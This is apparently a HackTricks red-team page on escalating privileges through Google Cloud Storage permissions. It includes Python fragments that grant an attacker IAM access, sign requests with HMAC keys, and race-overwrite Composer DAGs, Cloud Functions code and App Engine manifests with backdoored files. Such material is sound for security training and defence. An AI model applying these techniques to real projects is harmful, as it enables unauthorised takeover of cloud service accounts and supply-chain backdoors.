GCP - Storage Privesc
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Basic Information:
GCP - Storage Enum
storage.objects.get
This permission allows you to download files stored inside Cloud Storage. This can potentially allow you to escalate privileges because on some occasions sensitive information is saved there. Moreover, some GCP services store their information in buckets:
GCP Composer: When you create a Composer Environment the code of all the DAGs will be saved inside a bucket. These tasks might contain interesting information inside of their code.
GCR (Container Registry): The images of the containers are stored inside buckets, which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code.
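With only an OAuth access token for a principal holding storage.objects.get, objects can be fetched directly over the JSON API. A minimal sketch of building the download URL (the bucket and object names here are hypothetical):

```python
import urllib.parse

def object_download_url(bucket: str, obj: str) -> str:
    """Build the GCS JSON API URL that returns an object's contents.

    A GET on this URL with an "Authorization: Bearer <token>" header
    downloads the object, provided the token's principal has
    storage.objects.get on it.
    """
    # Object names must be URL-encoded, including any "/" in the path.
    encoded = urllib.parse.quote(obj, safe="")
    return (f"https://storage.googleapis.com/storage/v1/b/{bucket}"
            f"/o/{encoded}?alt=media")

# Example: fetching a Composer DAG from its environment bucket.
url = object_download_url("example-composer-bucket", "dags/etl.py")
```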
storage.objects.setIamPolicy
You can grant yourself permission to abuse any of the previous scenarios in this section.
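Abusing this permission boils down to fetching the object's current IAM policy, adding a binding for yourself, and writing it back with setIamPolicy. A sketch of the policy-patching step (role and member values are illustrative):

```python
def grant_binding(policy: dict, role: str, member: str) -> dict:
    """Add a member to a role binding in an IAM policy dict, as you
    would before writing it back with setIamPolicy."""
    for b in policy.setdefault("bindings", []):
        if b["role"] == role:
            if member not in b["members"]:
                b["members"].append(member)
            return policy
    # No existing binding for this role: create one.
    policy["bindings"].append({"role": role, "members": [member]})
    return policy

# Hypothetical: make yourself a viewer of a sensitive object.
policy = {"bindings": [{"role": "roles/storage.legacyObjectReader",
                        "members": ["projectViewer:some-project"]}]}
grant_binding(policy, "roles/storage.objectViewer",
              "user:attacker@example.com")
```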
storage.buckets.setIamPolicy
For an example on how to modify permissions with this permission check this page:
GCP - Public Buckets Privilege Escalation
storage.hmacKeys.create
Cloud Storage's "interoperability" feature, designed for cross-cloud interactions such as with AWS S3, involves the creation of HMAC keys for Service Accounts and users. An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges, thus escalating privileges within Cloud Storage. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible there, providing a persistent backup way to access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable after creation, adding a layer of complexity for continuous access.
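Once a key exists (e.g. created with `gsutil hmac create <sa-email>`), it is used against the S3-compatible XML API at storage.googleapis.com with standard AWS Signature V4. A stdlib-only sketch of deriving the SigV4 signing key from the HMAC secret (the secret and region values are placeholders):

```python
import hashlib
import hmac

def sigv4_signing_key(secret: str, date: str, region: str) -> bytes:
    """Derive the AWS SigV4 signing key that GCS's S3-compatible
    XML API accepts for an interoperability HMAC key.

    secret: the HMAC secret shown once at key-creation time
    date:   request date as YYYYMMDD
    region: the region string used in the credential scope
    """
    def h(key: bytes, msg: str) -> bytes:
        return hmac.new(key, msg.encode(), hashlib.sha256).digest()
    k_date = h(("AWS4" + secret).encode(), date)
    k_region = h(k_date, region)
    k_service = h(k_region, "s3")
    return h(k_service, "aws4_request")
```

The resulting key is then used to HMAC the SigV4 string-to-sign, exactly as an S3 client would; any S3-compatible tool pointed at storage.googleapis.com can do this for you.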
Another exploit script for this method can be found here.
storage.objects.create, storage.objects.delete = Storage Write permissions
In order to create a new object inside a bucket you need storage.objects.create and, according to the docs, you also need storage.objects.delete to modify an existing object.
A very common way to exploit a bucket you can write to is when the bucket stores web server files: you might be able to upload new code that will be executed by the web application.
Composer is Apache Airflow managed inside GCP. It has several interesting features:
It runs inside a GKE cluster, so the SA the cluster uses is accessible by the code running inside Composer
All the components of a Composer environment (code of DAGs, plugins and data) are stored inside a GCP bucket. If an attacker has read and write permissions over it, they could monitor the bucket and, whenever a DAG is created or updated, submit a backdoored version, so the Composer environment will fetch the backdoored version from storage.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs
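The core of such a monitor is just diffing two bucket listings taken at different times and reacting to anything new or updated. A simplified sketch of that detection step (the listing format, mapping object names to generations, is an assumption):

```python
def changed_objects(old: dict, new: dict) -> list:
    """Given two {object_name: generation} listings of the Composer
    bucket taken at different times, return the objects that were
    added or updated -- the trigger for re-uploading a backdoored
    version of the DAG."""
    return sorted(name for name, gen in new.items()
                  if old.get(name) != gen)

# Example listings: one DAG updated, one DAG newly created.
before = {"dags/etl.py": "gen1"}
after = {"dags/etl.py": "gen2", "dags/new_dag.py": "gen1"}
changed = changed_objects(before, after)
```

In a real PoC this runs in a loop against the objects.list API, and each changed DAG is immediately overwritten with a version that keeps the original logic plus a payload.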
Cloud Functions code is stored in Storage, and whenever a new version is created the code is pushed to the bucket and then the new container is built from this code. Therefore, by overwriting the code before the new version gets built, it's possible to make the cloud function execute arbitrary code.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions
AppEngine versions generate some data inside a bucket with the name format staging.<project-id>.appspot.com. Inside this bucket, it's possible to find a folder called ae that contains one folder per version of the AppEngine app, and inside these folders it's possible to find the manifest.json file. This file contains a JSON with all the files that must be used to create the specific version. Moreover, it contains the real names of the files, the URL to them inside the GCP bucket (the files inside the bucket were renamed to their sha1 hash) and the sha1 hash of each file.
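Reproducing that naming scheme is straightforward: the object name in the staging bucket is the file's SHA-1 hash. A sketch of building one manifest entry for a file (the exact field names in manifest.json are an assumption based on the structure described above):

```python
import hashlib

def manifest_entry(bucket: str, data: bytes) -> dict:
    """Build a staging-bucket manifest entry for a file: the object
    in the bucket is named after the file's SHA-1 hash, and the
    entry records both the URL and the hash."""
    sha1 = hashlib.sha1(data).hexdigest()
    return {
        "sourceUrl": f"https://storage.googleapis.com/{bucket}/{sha1}",
        "sha1Sum": sha1,
    }

# Hypothetical bucket and payload.
entry = manifest_entry("staging.example.appspot.com", b"print('pwn')")
```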
Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name appspot.com.
However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.
The mentioned attack can be performed in several different ways; all of them start by monitoring the staging.<project-id>.appspot.com bucket:

- Upload the complete new code of the AppEngine version to a different, available bucket and prepare a manifest.json file with the new bucket name and the sha1 hashes of the files. Then, when a new version is created inside the bucket, you just need to modify the manifest.json file and upload the malicious one.
- Upload a modified requirements.txt that will pull in malicious dependency code and update the manifest.json file with the new filename, URL and hash.
- Upload a modified main.py or app.yaml file that will execute the malicious code and update the manifest.json file with the new filename, URL and hash.
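All three variants end the same way: one entry in the freshly written manifest.json is swapped for an attacker-controlled file before the build consumes it. A sketch of that patching step (field names and manifest layout are assumptions):

```python
import copy

def backdoor_manifest(manifest: dict, filename: str,
                      new_url: str, new_sha1: str) -> dict:
    """Return a copy of a staging-bucket manifest with one file's
    URL and hash swapped for a malicious replacement, ready to be
    re-uploaded over the original manifest.json."""
    patched = copy.deepcopy(manifest)
    patched[filename] = {"sourceUrl": new_url, "sha1Sum": new_sha1}
    return patched

# Hypothetical manifest with a single entry for main.py.
manifest = {"main.py": {
    "sourceUrl": "https://storage.googleapis.com/staging.x.appspot.com/abc",
    "sha1Sum": "abc"}}
evil = backdoor_manifest(
    manifest, "main.py",
    "https://storage.googleapis.com/attacker-bucket/evil", "def0")
```

The race is then simply uploading the patched manifest faster than the build picks up the legitimate one.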
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine
Google Container Registry stores the images inside buckets; if you can write to those buckets you might be able to move laterally to where those images are being run.
The bucket used by GCR will have a URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (the top-level subdomains are specified here).
This service is deprecated, so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes it, doesn't store the images in buckets.